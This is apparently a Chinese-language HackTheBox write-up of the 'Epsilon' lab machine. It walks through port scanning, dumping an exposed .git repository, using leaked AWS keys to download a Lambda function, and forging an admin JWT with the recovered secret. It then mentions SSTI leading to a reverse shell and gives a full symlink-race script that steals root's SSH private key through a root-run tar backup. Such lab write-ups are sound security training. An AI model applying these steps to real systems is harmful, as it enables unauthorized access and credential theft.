打靶记录(一三一)之HTBEpsilon

端口扫描

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ sudo nmap --min-rate=10000 -p- 10.10.11.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 23:25 CST
Nmap scan report for 10.10.11.134
Host is up (0.071s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ sudo nmap -sT -sV -sC -O -p80 22,80,5000 10.10.11.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 23:27 CST
Failed to resolve "22,80,5000".
Nmap scan report for 10.10.11.134
Host is up (0.069s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds
                                                                                                     
┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ sudo nmap -sT -sV -sC -O -p22,80,5000 10.10.11.134 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 23:28 CST
Nmap scan report for 10.10.11.134
Host is up (0.069s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-git: 
|   10.10.11.134:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Updating Tracking API  # Please enter the commit message for...
|_http-title: 403 Forbidden
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
|_http-title: Costume Shop
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.07 seconds

Web

80端口有一个.git,用gittool中的gitdumper得到源码

┌──(mikannse㉿kali)-[~/tools/web/GitTools/Dumper]
└─$ ./gitdumper.sh http://10.10.11.134/.git/ ~/HTB/Epsilon/repo
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating /home/mikannse/HTB/Epsilon/repo/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
<SNIP>

再用extractor来还原一下提交记录

┌──(mikannse㉿kali)-[~/tools/web/GitTools/Extractor]
└─$ ./extractor.sh ~/HTB/Epsilon/repo ~/HTB/Epsilon/repo_
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
<SNIP>

一共有5次提交记录，有两个python脚本，可以合理怀疑是5000端口开的服务的源码。似乎有密钥什么的，在2-那个提交记录中有泄露aws密钥

server.py中就是一个flask服务，admin:admin可以登录验证但是试了下并没有跳转，看一下/home路由，是因为缺少了一个auth的cookie，是JWTToken并且是由secret这个值加密而来,。track-api.py则是一个使用boto3服务与lambda服务交互的脚本

什么是 boto3？

boto3 是 Amazon Web Services (AWS) 的官方 SDK（软件开发工具包）之一，用于 Python。它提供了与 AWS 服务交互的高级接口，支持几乎所有 AWS 服务，包括 S3、EC2、RDS、DynamoDB 等。boto3 的主要特点包括：

什么是 AWS Lambda？

AWS Lambda 是一种无服务器计算服务，允许开发者运行代码而无需预置或管理服务器。Lambda 会自动执行所有运维工作，包括容量规划、负载平衡、监控和日志记录。使用 Lambda，你可以专注于编写代码，并让 AWS 负责基础设施的管理。

先本地aws configure一下把得到的密钥信息和配置信息填进去，然后就能列举lambda服务的函数了

┌──(mikannse㉿kali)-[~]
└─$ aws --endpoint-url=http://cloud.epsilon.htb lambda list-functions
{
    "Functions": [
<SNIP>

发现就一个叫做costume_shop_v1的函数

┌──(mikannse㉿kali)-[~]
└─$ aws --endpoint-url=http://cloud.epsilon.htb lambda get-function --function-name=costume_shop_v1
{
<SNIP>
    "Code": {
        "Location": "http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code"
    },
    "Tags": {}
}

能够得到这个函数的下载地址

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ wget http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ file code                                                           
code: Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                     
┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ unzip code    
Archive:  code
  inflating: lambda_function.py

重要的部分是我们得到了secret,大概就是之前那个server.py中的secret，那就能伪造JWTtoken了

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ python               
Python 3.11.9 (main, Apr 10 2024, 13:16:36) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import jwt
>>> jwt.encode({"username":"admin"},key='RrXCv`mrNe!K!4+5`wYq',algorithm='HS256')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.WFYEm2-bZZxe2qpoAtRPBaoNekx-oOwueA80zzb3Rc4'

在浏览器中手动添加一个叫做”auth”的cookie,然后admin:admin登录,现在能够访问/home路由了

根据源码，在/order路由存在SSTI，可以抓包更改custome参数来提交,做个反弹shell

提权

上传一个pspy,发现一个进程以root身份执行这个备份脚本/bin/bash /usr/bin/backup.sh

#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*

经典tar的-cvf参数，一眼用检查点来提权,然而试了一下并不行，失算了

看眼WP,原来是因为tar的-h参数是获取符号链接并压缩,那么能够更改/opt/backups/checksum的内容，为我们想要获取的文件，可以通过这个bash脚本来实现

#!/bin/sh

if [ -e /opt/backups/checksum ]; then
    rm -f /opt/backups/checksum
    echo '[+] Checksum file removed'
    ln -sf /root/.ssh/id_rsa /opt/backups/checksum
    echo '[+] Symlink placed'
fi

while true; do ./hack.sh; done

等待输出之后再过一会儿等他下一次执行，然后来到/var/backups/web_backups/目录选择最新的那个归档,解包即可得到root的ssh私钥

碎碎念

这个放假真的NB，aws的lambda服务到jwttoken伪造再到SSTI，考点都不错。最后的tar -h参数第一次遇到